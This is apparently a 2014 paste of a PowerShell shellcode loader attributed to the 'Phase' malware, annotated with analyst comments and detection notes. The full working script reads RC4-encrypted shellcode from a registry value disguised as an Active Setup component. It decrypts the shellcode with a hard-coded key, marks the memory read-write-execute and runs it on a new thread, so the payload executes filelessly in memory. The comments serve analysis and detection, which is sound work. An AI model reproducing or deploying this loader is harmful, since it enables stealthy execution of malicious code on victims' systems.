
Phase PowerShell Script

a guest
Dec 11th, 2014
# Read And Execute Rc4 Encrypted ShellCode From The Registry
#
# Analyst notes on what the visible script does (no file is written to disk):
#   1. Reads a byte value (Rc4Encoded64 or Rc4Encoded32, chosen by pointer size)
#      from the HKCU key set below. How those values got there is not shown here.
#   2. RC4-decrypts the bytes in place with the fixed key "Phase" (KSA + PRGA).
#   3. Changes the buffer's page protection to 0x40 (PAGE_EXECUTE_READWRITE)
#      and runs it on a new thread, blocking until that thread exits.
# Observable artifacts for detection: the registry values named above, a
# runtime-compiled P/Invoke type (Add-Type) whose source names CreateThread /
# VirtualProtect / WaitForSingleObject, an RWX protection change, and a thread
# started on a non-image address. PowerShell script-block logging captures the
# whole source, including the Add-Type member definition.

# Set Registry Key
# Used only as a storage location for the encrypted payload; this script reads
# from it and never writes to it.
$sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';

# Set Key For Key Stream
# Hard-coded RC4 key; the same value decrypts both the x64 and x86 payloads.
[Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");

# Import Native Functions
# C# P/Invoke declarations compiled at runtime by Add-Type below. These three
# imports together are the classic in-memory execution triplet.
$sCode = @"
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);
[DllImport("kernel32.dll")]
public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
"@

# Make The Code Recognized By PowerShell
# Add-Type -memberDefinition compiles the snippet into type Win32Functions.Win32;
# the returned type object is used for the static calls at the bottom.
$pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru

# Declare Shellcode Array
# Appears to be a declaration only; the variable is actually assigned in the
# if/else that follows.
[Byte[]]$bShellCode;

# Check Pointer Size To Check If x64
# Selects the payload variant by the host process bitness, not the OS bitness.
if ([IntPtr]::Size -eq 8) {
    # Load Encrypted x64 Shellcode From Registry
    $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;
}else{
    # Load Encrypted x86 Shellcode From Registry
    $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;
}

# Define Byte Arrays That Are The Boxes
# RC4 state (S) and the key repeated to 256 bytes (K).
[Byte[]]$s = New-Object Byte[] 256;
[Byte[]]$k = New-Object Byte[] 256;

# Loop from 0 to 255 to fill the boxes
for ($i = 0; $i -lt 256; $i++){
    # Fill Box S With 0-255
    $s[$i] = [Byte]$i;
   
    # Fill Box K With (0-255)/dwKeyLen
    $k[$i] = $bKey[$i % $bKey.Length];
}

# Initialize j
$j = 0;

# Loop Through All 256 Bytes
# RC4 key-scheduling algorithm (KSA): permutes S according to K.
for ($i = 0; $i -lt 256; $i++){
    $j = ($j + $s[$i] + $k[$i]) % 256;
   
    # Hold Temporary Value Of S[i] For Swapping
    $bSwap = $s[$i];
   
    # Set S[i] With S[j]
    $s[$i] = $s[$j];
   
    # Set S[j] With Old Value Of S[i]
    $s[$j] = $bSwap;
}

# Initialize i
$i = 0;

# Initialize j
$j = 0;

# Loop Through The Bytes In The Buffer
# RC4 PRGA: generates the keystream byte by byte and XORs it over the payload
# in place, so $bShellCode holds plaintext once this loop finishes. A zero-length
# payload (value missing or empty) simply skips the loop.
for ($x = 0; $x -lt $bShellCode.Length; $x++){
    # Pseudo-Random Generation Algorithm
    $i = ($i + 1) % 256;
    $j = ($j + $s[$i]) % 256;
   
    # Hold Temporary Value Of S[i] For Swapping
    $bSwap = $s[$i];
   
    # Set S[i] With S[j]
    $s[$i] = $s[$j];
   
    # Set S[j] With Old Value Of S[i]
    $s[$j] = $bSwap;
    [int]$t = ($s[$i] + $s[$j]) % 256;
   
    # Xor PlainText With KeyStream
    $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];
}

# Check What Size We Should Allocate
$dwSize = $bShellCode.Length;

# Check Size Of ShellCode
# Guard: nothing below runs if no payload was read from the registry.
if ($dwSize -gt 0x00000000){
    # Variable To Hold Old Protection Flags
    [Int[]]$dwOldProt = 0x00000000;

    # Get Pointer To $dwOldProt
    # Address of element 0 of the managed Int[] is passed as lpflOldProtect.
    $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0)

    # Set Read/Write/Execute Flags On ShellCode
    # 0x40 == PAGE_EXECUTE_READWRITE. A protection change to RWX on a buffer
    # that is not a mapped image is a high-signal event for EDR/ETW monitoring.
    if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){     
        # Create A New Thread To Execute Our ShellCode
        # Thread start address is the managed byte array itself; all other
        # arguments are zero (default attributes, default stack, run immediately).
        $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0);
       
        # Wait For Our Thread
        # -1 == INFINITE, so the PowerShell process stays alive for as long as the
        # payload thread runs.
        $pFunctions::WaitForSingleObject($hThread, -1);
    }
}

  111. www.malwaretech.com